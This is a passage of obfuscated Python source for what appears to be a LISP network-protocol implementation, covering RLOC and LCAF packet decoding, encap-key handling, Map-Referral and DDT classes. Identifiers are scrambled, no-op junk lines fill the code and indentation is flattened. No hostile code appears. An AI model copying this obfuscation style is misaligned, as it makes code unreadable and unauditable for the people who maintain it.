ii1i1II = struct . pack ( "BBBBHH" , self . priority , self . weight ,
self . mpriority , self . mweight , socket . htons ( OO000OOO ) ,
socket . htons ( self . rloc . afi ) )
if 91 - 91: i11iIiiIii
if ( self . geo or self . elp or self . rle or self . keys or self . rloc_name or self . json ) :
if 6 - 6: O0 - iIii1I11I1II1 + I1Ii111 . o0oOOo0O0Ooo * i11iIiiIii
ii1i1II = ii1i1II [ 0 : - 2 ] + self . encode_lcaf ( )
else :
ii1i1II += self . rloc . pack_address ( )
if 53 - 53: OOooOOo / I1IiiI / oO0o * OOooOOo / i1IIi - I1Ii111
return ( ii1i1II )
if 71 - 71: O0 + Oo0Ooo % oO0o - o0oOOo0O0Ooo
if 82 - 82: iIii1I11I1II1
def decode_lcaf ( self , packet , nonce ) :
o00OooooOOOO = "HBBBBH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 64 - 64: ooOoO0o + I1IiiI % OOooOOo + II111iiii
oO0oO00 , Ooo0o00O0O0oO , OO000OOO , iiii1II , o000OOooo000O , o00O0oOO0o = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 46 - 46: I1IiiI
if 72 - 72: iII111i
o00O0oOO0o = socket . ntohs ( o00O0oOO0o )
packet = packet [ oO0o00O : : ]
if ( o00O0oOO0o > len ( packet ) ) : return ( None )
if 100 - 100: I1IiiI
if 55 - 55: i1IIi % IiII
if 44 - 44: oO0o - iIii1I11I1II1 / ooOoO0o - iIii1I11I1II1 % i1IIi + ooOoO0o
if 74 - 74: I11i . OoOoOO00 + OoOoOO00
if ( iiii1II == LISP_LCAF_AFI_LIST_TYPE ) :
while ( o00O0oOO0o > 0 ) :
o00OooooOOOO = "H"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( o00O0oOO0o < oO0o00O ) : return ( None )
if 87 - 87: IiII + o0oOOo0O0Ooo . i1IIi % I1Ii111
IIiiIiIIiI1 = len ( packet )
oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
oO0oO00 = socket . ntohs ( oO0oO00 )
if 44 - 44: Oo0Ooo - OOooOOo . Ii1I * OoooooooOO
if ( oO0oO00 == LISP_AFI_LCAF ) :
packet = self . decode_lcaf ( packet , nonce )
if ( packet == None ) : return ( None )
else :
packet = packet [ oO0o00O : : ]
self . rloc_name = None
if ( oO0oO00 == LISP_AFI_NAME ) :
packet , Ooo000oo0OO0 = lisp_decode_dist_name ( packet )
self . rloc_name = Ooo000oo0OO0
else :
self . rloc . afi = oO0oO00
packet = self . rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 93 - 93: OoO0O00 . OoO0O00
if 52 - 52: OOooOOo . oO0o / Oo0Ooo . OoooooooOO % I1ii11iIi11i
if 65 - 65: ooOoO0o % II111iiii . iII111i - iIii1I11I1II1 - I1IiiI
o00O0oOO0o -= IIiiIiIIiI1 - len ( packet )
if 63 - 63: I1IiiI . OoOoOO00 - II111iiii
if 55 - 55: ooOoO0o - o0oOOo0O0Ooo
elif ( iiii1II == LISP_LCAF_GEO_COORD_TYPE ) :
if 32 - 32: I1Ii111 * Ii1I / I1Ii111 . OoOoOO00 + I1ii11iIi11i - ooOoO0o
if 14 - 14: IiII * O0 + O0 - ooOoO0o . i11iIiiIii - IiII
if 37 - 37: I11i
if 19 - 19: OoooooooOO % I1Ii111
OOoooo = lisp_geo ( "" )
packet = OOoooo . decode_geo ( packet , o00O0oOO0o , o000OOooo000O )
if ( packet == None ) : return ( None )
self . geo = OOoooo
if 20 - 20: I11i
elif ( iiii1II == LISP_LCAF_JSON_TYPE ) :
if 15 - 15: o0oOOo0O0Ooo . i11iIiiIii * I1ii11iIi11i / ooOoO0o
if 41 - 41: ooOoO0o + IiII . i1IIi + iIii1I11I1II1
if 57 - 57: i11iIiiIii * oO0o * i11iIiiIii
if 14 - 14: Oo0Ooo / I11i
o00OooooOOOO = "H"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( o00O0oOO0o < oO0o00O ) : return ( None )
if 14 - 14: Oo0Ooo - Ii1I + ooOoO0o - I1IiiI % IiII
O0000000oooOO = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
O0000000oooOO = socket . ntohs ( O0000000oooOO )
if ( o00O0oOO0o < oO0o00O + O0000000oooOO ) : return ( None )
if 70 - 70: I1IiiI % ooOoO0o * OoO0O00 + OoOoOO00 % i11iIiiIii
packet = packet [ oO0o00O : : ]
self . json = lisp_json ( "" , packet [ 0 : O0000000oooOO ] )
packet = packet [ O0000000oooOO : : ]
if 39 - 39: Oo0Ooo % I1Ii111 / I1IiiI / Oo0Ooo . o0oOOo0O0Ooo + o0oOOo0O0Ooo
elif ( iiii1II == LISP_LCAF_ELP_TYPE ) :
if 83 - 83: OoooooooOO * II111iiii % OoooooooOO
if 30 - 30: I1Ii111 / o0oOOo0O0Ooo + OoooooooOO + OoOoOO00 + OoO0O00
if 40 - 40: OoooooooOO / IiII
if 82 - 82: i11iIiiIii - oO0o - i1IIi
OOo0oo0OOOO = lisp_elp ( None )
OOo0oo0OOOO . elp_nodes = [ ]
while ( o00O0oOO0o > 0 ) :
OO000OOO , oO0oO00 = struct . unpack ( "HH" , packet [ : 4 ] )
if 36 - 36: I1IiiI % ooOoO0o . OoooooooOO . OoOoOO00 / I11i
oO0oO00 = socket . ntohs ( oO0oO00 )
if ( oO0oO00 == LISP_AFI_LCAF ) : return ( None )
if 1 - 1: I1Ii111 / Ii1I % I1ii11iIi11i
Oo0ooOOOOOoO = lisp_elp_node ( )
OOo0oo0OOOO . elp_nodes . append ( Oo0ooOOOOOoO )
if 70 - 70: OoOoOO00 * ooOoO0o . I1IiiI
OO000OOO = socket . ntohs ( OO000OOO )
Oo0ooOOOOOoO . eid = ( OO000OOO & 0x4 )
Oo0ooOOOOOoO . probe = ( OO000OOO & 0x2 )
Oo0ooOOOOOoO . strict = ( OO000OOO & 0x1 )
Oo0ooOOOOOoO . address . afi = oO0oO00
Oo0ooOOOOOoO . address . mask_len = Oo0ooOOOOOoO . address . host_mask_len ( )
packet = Oo0ooOOOOOoO . address . unpack_address ( packet [ 4 : : ] )
o00O0oOO0o -= Oo0ooOOOOOoO . address . addr_length ( ) + 4
if 64 - 64: ooOoO0o % I1ii11iIi11i . OoO0O00 . ooOoO0o + i11iIiiIii . iIii1I11I1II1
OOo0oo0OOOO . select_elp_node ( )
self . elp = OOo0oo0OOOO
if 70 - 70: ooOoO0o
elif ( iiii1II == LISP_LCAF_RLE_TYPE ) :
if 3 - 3: I1IiiI - I1IiiI
if 89 - 89: OoOoOO00
if 27 - 27: i1IIi % OoOoOO00 / Ii1I * Ii1I / I11i
if 11 - 11: OOooOOo
OoO000oo000o0 = lisp_rle ( None )
OoO000oo000o0 . rle_nodes = [ ]
while ( o00O0oOO0o > 0 ) :
OoOO0OOOO0 , oOoOoO0Oo0oo , i1Ii , oO0oO00 = struct . unpack ( "HBBH" , packet [ : 6 ] )
if 96 - 96: ooOoO0o % Ii1I
oO0oO00 = socket . ntohs ( oO0oO00 )
if ( oO0oO00 == LISP_AFI_LCAF ) : return ( None )
if 83 - 83: I1IiiI - OOooOOo . I1IiiI * Oo0Ooo
Oo0000O00o0 = lisp_rle_node ( )
OoO000oo000o0 . rle_nodes . append ( Oo0000O00o0 )
if 76 - 76: i11iIiiIii + Ii1I
Oo0000O00o0 . level = i1Ii
Oo0000O00o0 . address . afi = oO0oO00
Oo0000O00o0 . address . mask_len = Oo0000O00o0 . address . host_mask_len ( )
packet = Oo0000O00o0 . address . unpack_address ( packet [ 6 : : ] )
if 14 - 14: OoO0O00 * OoooooooOO
o00O0oOO0o -= Oo0000O00o0 . address . addr_length ( ) + 6
if ( o00O0oOO0o >= 2 ) :
oO0oO00 = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
if ( socket . ntohs ( oO0oO00 ) == LISP_AFI_NAME ) :
packet = packet [ 2 : : ]
packet , Oo0000O00o0 . rloc_name = lisp_decode_dist_name ( packet )
if 45 - 45: iIii1I11I1II1 * I1IiiI . OoOoOO00
if ( packet == None ) : return ( None )
o00O0oOO0o -= len ( Oo0000O00o0 . rloc_name ) + 1 + 2
if 97 - 97: I11i % II111iiii % Ii1I . II111iiii . iIii1I11I1II1
if 98 - 98: i11iIiiIii + O0 - O0 - iII111i
if 25 - 25: oO0o / O0 + I1Ii111 % i11iIiiIii / I1IiiI
self . rle = OoO000oo000o0
self . rle . build_forwarding_list ( )
if 62 - 62: iII111i . I11i * i1IIi + iII111i
elif ( iiii1II == LISP_LCAF_SECURITY_TYPE ) :
if 95 - 95: Ii1I / o0oOOo0O0Ooo % ooOoO0o - I1IiiI / OOooOOo * OOooOOo
if 6 - 6: OoO0O00 % IiII + iIii1I11I1II1
if 18 - 18: II111iiii . Ii1I + OoOoOO00 + O0 - I11i
if 30 - 30: II111iiii
if 26 - 26: I11i - i1IIi - Oo0Ooo * O0 * OOooOOo . OoooooooOO
IiIIIii1iIII1 = packet
i1i1IIiIiI11 = lisp_keys ( 1 )
packet = i1i1IIiIiI11 . decode_lcaf ( IiIIIii1iIII1 , o00O0oOO0o )
if ( packet == None ) : return ( None )
if 99 - 99: oO0o . OoO0O00 / OOooOOo
if 12 - 12: iIii1I11I1II1 + ooOoO0o * I1Ii111 % OoooooooOO / iIii1I11I1II1
if 43 - 43: O0 . i1IIi - OoooooooOO - i1IIi - I1ii11iIi11i
if 8 - 8: OoOoOO00 / Ii1I
IIiIiIii11I1 = [ LISP_CS_25519_CBC , LISP_CS_25519_CHACHA ]
if ( i1i1IIiIiI11 . cipher_suite in IIiIiIii11I1 ) :
if ( i1i1IIiIiI11 . cipher_suite == LISP_CS_25519_CBC ) :
iII1 = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 12 - 12: iIii1I11I1II1
if ( i1i1IIiIiI11 . cipher_suite == LISP_CS_25519_CHACHA ) :
iII1 = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 52 - 52: oO0o . I1ii11iIi11i + oO0o
else :
iII1 = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 73 - 73: II111iiii / i11iIiiIii / ooOoO0o
packet = iII1 . decode_lcaf ( IiIIIii1iIII1 , o00O0oOO0o )
if ( packet == None ) : return ( None )
if 1 - 1: iII111i + OoOoOO00 / IiII - I1IiiI % I1IiiI
if ( len ( packet ) < 2 ) : return ( None )
oO0oO00 = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
self . rloc . afi = socket . ntohs ( oO0oO00 )
if ( len ( packet ) < self . rloc . addr_length ( ) ) : return ( None )
packet = self . rloc . unpack_address ( packet [ 2 : : ] )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 6 - 6: OoOoOO00 - i1IIi + II111iiii % oO0o
if 72 - 72: OOooOOo + OOooOOo
if 30 - 30: I11i
if 15 - 15: O0 - i1IIi . iIii1I11I1II1 - i11iIiiIii / Ii1I
if 11 - 11: iIii1I11I1II1 + I1IiiI
if 15 - 15: o0oOOo0O0Ooo
if ( self . rloc . is_null ( ) ) : return ( packet )
if 55 - 55: i11iIiiIii / OoooooooOO - I11i
O0Oo0oO0 = self . rloc_name
if ( O0Oo0oO0 ) : O0Oo0oO0 = blue ( self . rloc_name , False )
if 9 - 9: i1IIi + i11iIiiIii + I1ii11iIi11i % OoOoOO00 / i11iIiiIii + i11iIiiIii
if 13 - 13: Ii1I % ooOoO0o
if 92 - 92: II111iiii + Ii1I + Ii1I
if 68 - 68: OoooooooOO / o0oOOo0O0Ooo + iIii1I11I1II1 . Ii1I % Ii1I - I1IiiI
if 26 - 26: iIii1I11I1II1 - I1IiiI + iII111i
if 61 - 61: i1IIi + OOooOOo + iIii1I11I1II1
II = self . keys [ 1 ] if self . keys else None
if ( II == None ) :
if ( iII1 . remote_public_key == None ) :
IIIiiiI1Ii1 = bold ( "No remote encap-public-key supplied" , False )
lprint ( " {} for {}" . format ( IIIiiiI1Ii1 , O0Oo0oO0 ) )
iII1 = None
else :
IIIiiiI1Ii1 = bold ( "New encap-keying with new state" , False )
lprint ( " {} for {}" . format ( IIIiiiI1Ii1 , O0Oo0oO0 ) )
iII1 . compute_shared_key ( "encap" )
if 76 - 76: iIii1I11I1II1 + I1ii11iIi11i + iIii1I11I1II1 + OoO0O00
if 83 - 83: i1IIi + Oo0Ooo . O0 / IiII - II111iiii + ooOoO0o
if 17 - 17: OOooOOo
if 93 - 93: Oo0Ooo / II111iiii . Oo0Ooo + i1IIi + i1IIi
if 30 - 30: OoOoOO00 . OOooOOo % OOooOOo / II111iiii + i1IIi
if 61 - 61: i1IIi % II111iiii * II111iiii . o0oOOo0O0Ooo / I1ii11iIi11i - I1Ii111
if 93 - 93: Ii1I - i1IIi
if 3 - 3: oO0o + OoO0O00 - iII111i / Ii1I
if 58 - 58: Ii1I * I11i
if 95 - 95: oO0o
if ( II ) :
if ( iII1 . remote_public_key == None ) :
iII1 = None
ii1IIi = bold ( "Remote encap-unkeying occurred" , False )
lprint ( " {} for {}" . format ( ii1IIi , O0Oo0oO0 ) )
elif ( II . compare_keys ( iII1 ) ) :
iII1 = II
lprint ( " Maintain stored encap-keys for {}" . format ( O0Oo0oO0 ) )
if 49 - 49: I1IiiI
else :
if ( II . remote_public_key == None ) :
IIIiiiI1Ii1 = "New encap-keying for existing state"
else :
IIIiiiI1Ii1 = "Remote encap-rekeying"
if 23 - 23: I1Ii111
lprint ( " {} for {}" . format ( bold ( IIIiiiI1Ii1 , False ) ,
O0Oo0oO0 ) )
II . remote_public_key = iII1 . remote_public_key
II . compute_shared_key ( "encap" )
iII1 = II
if 5 - 5: I1ii11iIi11i % OoOoOO00 . OoooooooOO . o0oOOo0O0Ooo + i11iIiiIii
if 54 - 54: ooOoO0o - O0 + iII111i
self . keys = [ None , iII1 , None , None ]
if 34 - 34: Ii1I - OOooOOo % iII111i
else :
if 48 - 48: oO0o - O0
if 17 - 17: iIii1I11I1II1 . IiII / ooOoO0o % I11i + o0oOOo0O0Ooo - iIii1I11I1II1
if 95 - 95: OoOoOO00 + OOooOOo - I11i * i1IIi + i1IIi * O0
if 60 - 60: Oo0Ooo + I11i % iIii1I11I1II1 % oO0o - I1Ii111 / o0oOOo0O0Ooo
packet = packet [ o00O0oOO0o : : ]
if 9 - 9: IiII / oO0o % O0 * I1Ii111 - iIii1I11I1II1 % i1IIi
return ( packet )
if 83 - 83: OoOoOO00 + OOooOOo / OoooooooOO
if 39 - 39: OoO0O00 % iII111i . oO0o . II111iiii - i11iIiiIii
def decode ( self , packet , nonce ) :
o00OooooOOOO = "BBBBHH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 85 - 85: O0 - OoOoOO00
self . priority , self . weight , self . mpriority , self . mweight , OO000OOO , oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 17 - 17: o0oOOo0O0Ooo / i1IIi / OOooOOo
if 91 - 91: I1ii11iIi11i / Ii1I - OoOoOO00 . I11i / oO0o
OO000OOO = socket . ntohs ( OO000OOO )
oO0oO00 = socket . ntohs ( oO0oO00 )
self . local_bit = True if ( OO000OOO & 0x0004 ) else False
self . probe_bit = True if ( OO000OOO & 0x0002 ) else False
self . reach_bit = True if ( OO000OOO & 0x0001 ) else False
if 16 - 16: IiII % iII111i . oO0o . I1IiiI % O0 * I11i
if ( oO0oO00 == LISP_AFI_LCAF ) :
packet = packet [ oO0o00O - 2 : : ]
packet = self . decode_lcaf ( packet , nonce )
else :
self . rloc . afi = oO0oO00
packet = packet [ oO0o00O : : ]
packet = self . rloc . unpack_address ( packet )
if 99 - 99: OoOoOO00 / OoooooooOO + iII111i * I11i * i11iIiiIii + OOooOOo
self . rloc . mask_len = self . rloc . host_mask_len ( )
return ( packet )
if 40 - 40: II111iiii / I11i % I1IiiI - O0
if 39 - 39: i11iIiiIii - OoOoOO00 % OOooOOo + ooOoO0o + i11iIiiIii
def end_of_rlocs ( self , packet , rloc_count ) :
for i1i1IIIIIIIi in range ( rloc_count ) :
packet = self . decode ( packet , None )
if ( packet == None ) : return ( None )
if 59 - 59: IiII / OoOoOO00 - I1Ii111 - ooOoO0o . oO0o
return ( packet )
if 87 - 87: oO0o + I1IiiI * I1Ii111 * o0oOOo0O0Ooo + O0
if 21 - 21: I1Ii111 + OoOoOO00 + OoOoOO00 . II111iiii / I1Ii111 . I1IiiI
if 66 - 66: I1Ii111 % oO0o . iII111i * i1IIi
if 81 - 81: OoooooooOO * I1IiiI / I1Ii111
if 10 - 10: I1IiiI - II111iiii / IiII * II111iiii
if 67 - 67: II111iiii . Ii1I % oO0o . Oo0Ooo + IiII
if 10 - 10: OOooOOo - OoO0O00 * oO0o / iIii1I11I1II1 - OoOoOO00
if 20 - 20: IiII % I1IiiI + iIii1I11I1II1 % iII111i
if 100 - 100: o0oOOo0O0Ooo - Oo0Ooo % I1Ii111 . i11iIiiIii % OoooooooOO
if 39 - 39: I1ii11iIi11i / i11iIiiIii * i1IIi * Oo0Ooo
if 39 - 39: OoO0O00 * OoooooooOO / i1IIi + Oo0Ooo
if 57 - 57: O0
if 83 - 83: OOooOOo / Ii1I * I1IiiI % oO0o / iIii1I11I1II1
if 1 - 1: I11i / OoooooooOO / iII111i
if 68 - 68: i1IIi / Oo0Ooo / I11i * Oo0Ooo
if 91 - 91: OoO0O00 . iII111i
if 82 - 82: I1ii11iIi11i / Oo0Ooo
if 63 - 63: I1IiiI
if 3 - 3: iII111i + I1ii11iIi11i
if 35 - 35: oO0o * iII111i * oO0o * I1Ii111 * IiII * i1IIi
if 43 - 43: OoO0O00 * I1IiiI / IiII . i11iIiiIii + iII111i + o0oOOo0O0Ooo
if 1 - 1: I1IiiI % o0oOOo0O0Ooo . I1Ii111 + I11i * oO0o
if 41 - 41: OoO0O00 * oO0o - II111iiii
if 2 - 2: IiII + IiII - OoO0O00 * iII111i . oO0o
if 91 - 91: ooOoO0o
if 22 - 22: ooOoO0o % OoO0O00 * OoOoOO00 + Oo0Ooo
if 44 - 44: O0 - I11i
if 43 - 43: O0
if 50 - 50: I11i - OoooooooOO
if 29 - 29: oO0o * oO0o
class lisp_map_referral ( ) :
def __init__ ( self ) :
self . record_count = 0
self . nonce = 0
if 44 - 44: ooOoO0o . I1IiiI * oO0o * Ii1I
if 41 - 41: i1IIi % i11iIiiIii + I11i % OoooooooOO / I1ii11iIi11i
def print_map_referral ( self ) :
lprint ( "{} -> record-count: {}, nonce: 0x{}" . format ( bold ( "Map-Referral" , False ) , self . record_count ,
# iII111i
lisp_hex_string ( self . nonce ) ) )
if 54 - 54: OoO0O00 / I1IiiI
if 4 - 4: O0
def encode ( self ) :
i1IiIiiiii11 = ( LISP_MAP_REFERRAL << 28 ) | self . record_count
ii1i1II = struct . pack ( "I" , socket . htonl ( i1IiIiiiii11 ) )
ii1i1II += struct . pack ( "Q" , self . nonce )
return ( ii1i1II )
if 87 - 87: IiII - OoO0O00 * Oo0Ooo / o0oOOo0O0Ooo % oO0o % Ii1I
if 25 - 25: Ii1I - I1ii11iIi11i + Oo0Ooo . I1IiiI
def decode ( self , packet ) :
o00OooooOOOO = "I"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 36 - 36: iII111i
i1IiIiiiii11 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
i1IiIiiiii11 = socket . ntohl ( i1IiIiiiii11 [ 0 ] )
self . record_count = i1IiIiiiii11 & 0xff
packet = packet [ oO0o00O : : ]
if 3 - 3: Ii1I
o00OooooOOOO = "Q"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 44 - 44: O0 - oO0o % II111iiii . I1Ii111
self . nonce = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
return ( packet )
if 86 - 86: IiII
if 71 - 71: Ii1I - i1IIi . I1IiiI
if 15 - 15: i1IIi % II111iiii / II111iiii - I1ii11iIi11i - I11i % i1IIi
if 54 - 54: i1IIi . OoO0O00 + iII111i + OoO0O00 * i1IIi
if 13 - 13: Oo0Ooo / OoO0O00 + OOooOOo
if 90 - 90: OoO0O00 * i11iIiiIii / oO0o
if 91 - 91: iII111i - OoOoOO00 / Oo0Ooo % II111iiii / II111iiii / o0oOOo0O0Ooo
if 34 - 34: OoO0O00 * II111iiii + i11iIiiIii % Ii1I
class lisp_ddt_entry ( ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . delegation_set = [ ]
self . source_cache = None
self . map_referrals_sent = 0
if 25 - 25: OoOoOO00 + IiII . i11iIiiIii
if 87 - 87: I1IiiI + OoooooooOO + O0
def is_auth_prefix ( self ) :
if ( len ( self . delegation_set ) != 0 ) : return ( False )
if ( self . is_star_g ( ) ) : return ( False )
return ( True )
if 32 - 32: Ii1I / I1ii11iIi11i . Ii1I
if 65 - 65: IiII
def is_ms_peer_entry ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( False )
return ( self . delegation_set [ 0 ] . is_ms_peer ( ) )
if 74 - 74: Oo0Ooo + i1IIi - II111iiii / ooOoO0o / iII111i
if 66 - 66: ooOoO0o / IiII * iIii1I11I1II1
def print_referral_type ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( "unknown" )
I11i1ii11 = self . delegation_set [ 0 ]
return ( I11i1ii11 . print_node_type ( ) )
if 8 - 8: I1ii11iIi11i % Oo0Ooo % O0 + I1ii11iIi11i % I1ii11iIi11i
if 74 - 74: O0 * IiII . I11i - I1Ii111 + O0 + I11i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 48 - 48: oO0o . o0oOOo0O0Ooo - OOooOOo
if 29 - 29: Oo0Ooo - Ii1I - Oo0Ooo
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_ddt_cache . add_cache ( self . eid , self )
else :
OO = lisp_ddt_cache . lookup_cache ( self . group , True )
if ( OO == None ) :
OO = lisp_ddt_entry ( )
OO . eid . copy_address ( self . group )
OO . group . copy_address ( self . group )
lisp_ddt_cache . add_cache ( self . group , OO )
if 14 - 14: I1ii11iIi11i * oO0o . O0
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( OO . group )
OO . add_source_entry ( self )
if 72 - 72: i11iIiiIii % I11i / I1Ii111 + I1IiiI * iII111i
if 69 - 69: I1Ii111 + O0 . IiII . o0oOOo0O0Ooo
if 38 - 38: IiII / i1IIi
def add_source_entry ( self , source_ddt ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ddt . eid , source_ddt )
if 60 - 60: OoOoOO00
if 75 - 75: II111iiii / iIii1I11I1II1 / OoooooooOO
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 61 - 61: IiII . IiII
if 17 - 17: OoOoOO00 % Oo0Ooo / I1Ii111 . Ii1I % OoO0O00
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 32 - 32: I1IiiI + ooOoO0o / O0 * i11iIiiIii % Oo0Ooo + II111iiii
if 95 - 95: iII111i / ooOoO0o + I1Ii111
if 78 - 78: iIii1I11I1II1 / I1IiiI - IiII
class lisp_ddt_node ( ) :
def __init__ ( self ) :
self . delegate_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . map_server_peer = False
self . map_server_child = False
self . priority = 0
self . weight = 0
if 81 - 81: I1ii11iIi11i
if 31 - 31: O0 % ooOoO0o / I1IiiI * iII111i % iIii1I11I1II1 * OoOoOO00
def print_node_type ( self ) :
if ( self . is_ddt_child ( ) ) : return ( "ddt-child" )
if ( self . is_ms_child ( ) ) : return ( "map-server-child" )
if ( self . is_ms_peer ( ) ) : return ( "map-server-peer" )
if 76 - 76: I1Ii111 - O0
if 23 - 23: O0 * Ii1I * ooOoO0o % ooOoO0o
def is_ddt_child ( self ) :
if ( self . map_server_child ) : return ( False )
if ( self . map_server_peer ) : return ( False )
return ( True )
if 7 - 7: II111iiii + I11i
if 99 - 99: iIii1I11I1II1 * oO0o
def is_ms_child ( self ) :
return ( self . map_server_child )
if 37 - 37: ooOoO0o * iII111i * I11i
if 11 - 11: I1IiiI
def is_ms_peer ( self ) :
return ( self . map_server_peer )
if 48 - 48: O0 . I11i
if 9 - 9: oO0o / Oo0Ooo
if 85 - 85: i11iIiiIii / I1IiiI . OoO0O00 . I11i . oO0o * IiII
if 41 - 41: Ii1I / OoO0O00 / OoO0O00 * I11i
if 31 - 31: Ii1I / OoooooooOO % iIii1I11I1II1 - IiII * I1IiiI - O0
if 31 - 31: oO0o
if 74 - 74: OoO0O00
class lisp_ddt_map_request ( ) :
def __init__ ( self , lisp_sockets , packet , eid , group , nonce ) :
self . uptime = lisp_get_timestamp ( )
self . lisp_sockets = lisp_sockets
self . packet = packet
self . eid = eid
self . group = group
self . nonce = nonce
self . mr_source = None
self . sport = 0
self . itr = None
self . retry_count = 0
self . send_count = 0
self . retransmit_timer = None
self . last_request_sent_to = None
self . from_pitr = False
self . tried_root = False
self . last_cached_prefix = [ None , None ]
if 11 - 11: oO0o + O0 % Ii1I . I11i * o0oOOo0O0Ooo
if 14 - 14: I11i . iIii1I11I1II1 + I1Ii111 % OoooooooOO
def print_ddt_map_request ( self ) :
lprint ( "Queued Map-Request from {}ITR {}->{}, nonce 0x{}" . format ( "P" if self . from_pitr else "" ,
# iII111i
red ( self . itr . print_address ( ) , False ) ,
green ( self . eid . print_address ( ) , False ) , self . nonce ) )
if 36 - 36: Ii1I / I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo
if 64 - 64: I11i % i11iIiiIii % I1ii11iIi11i
def queue_map_request ( self ) :
self . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
lisp_retransmit_ddt_map_request , [ self ] )
self . retransmit_timer . start ( )
lisp_ddt_map_requestQ [ str ( self . nonce ) ] = self
if 14 - 14: I1Ii111 - OoOoOO00 - I1ii11iIi11i % I11i + OoooooooOO
if 4 - 4: I1Ii111 - I1IiiI / iIii1I11I1II1 + I1ii11iIi11i % iIii1I11I1II1 * I1IiiI
def dequeue_map_request ( self ) :
self . retransmit_timer . cancel ( )
if ( lisp_ddt_map_requestQ . has_key ( str ( self . nonce ) ) ) :
lisp_ddt_map_requestQ . pop ( str ( self . nonce ) )
if 30 - 30: i11iIiiIii % OOooOOo
if 52 - 52: I11i - oO0o . i11iIiiIii - II111iiii + Ii1I . iII111i
if 27 - 27: I1IiiI + OoOoOO00 + iII111i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 70 - 70: I11i + IiII . ooOoO0o - I1ii11iIi11i
if 34 - 34: i1IIi % Oo0Ooo . oO0o
if 36 - 36: I1ii11iIi11i / I1Ii111 - IiII + OOooOOo + I1Ii111
if 62 - 62: Oo0Ooo . OoO0O00 * I1Ii111 . i11iIiiIii * O0
if 10 - 10: Oo0Ooo / OoOoOO00 * OOooOOo - IiII + Ii1I
if 62 - 62: I1IiiI . Ii1I
if 74 - 74: Ii1I - I11i % ooOoO0o - I1IiiI - Ii1I - II111iiii
if 81 - 81: i1IIi * I1ii11iIi11i + IiII - OoO0O00 * i1IIi
if 6 - 6: iIii1I11I1II1 % OoOoOO00 % II111iiii % o0oOOo0O0Ooo
if 52 - 52: Ii1I - I1IiiI * iIii1I11I1II1 % Oo0Ooo * OOooOOo
if 67 - 67: OoooooooOO * I11i * Ii1I * iIii1I11I1II1
if 22 - 22: OoO0O00 / o0oOOo0O0Ooo
if 35 - 35: I1Ii111 / I1Ii111 + o0oOOo0O0Ooo - oO0o
if 40 - 40: OoOoOO00 - II111iiii
if 29 - 29: I1IiiI - O0
if 36 - 36: I1IiiI * I1IiiI
if 79 - 79: I1Ii111 - I11i
if 49 - 49: II111iiii + O0 * ooOoO0o - Oo0Ooo
if 89 - 89: I1IiiI + I11i . oO0o . II111iiii + oO0o / Oo0Ooo
if 32 - 32: OoO0O00 % oO0o * I1ii11iIi11i + I11i / I1Ii111
LISP_DDT_ACTION_SITE_NOT_FOUND = - 2
LISP_DDT_ACTION_NULL = - 1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
if 5 - 5: o0oOOo0O0Ooo + iII111i / OoooooooOO + Ii1I . OoOoOO00 / oO0o
lisp_map_referral_action_string = [
"node-referral" , "ms-referral" , "ms-ack" , "ms-not-registered" ,
"delegation-hole" , "not-authoritative" ]
if 18 - 18: II111iiii . o0oOOo0O0Ooo
if 75 - 75: OoooooooOO - Oo0Ooo
if 56 - 56: II111iiii - i11iIiiIii - oO0o . o0oOOo0O0Ooo
if 4 - 4: i1IIi
if 91 - 91: IiII . OoO0O00 * Ii1I / o0oOOo0O0Ooo
if 41 - 41: I1IiiI . OoO0O00 / i1IIi . Oo0Ooo . oO0o
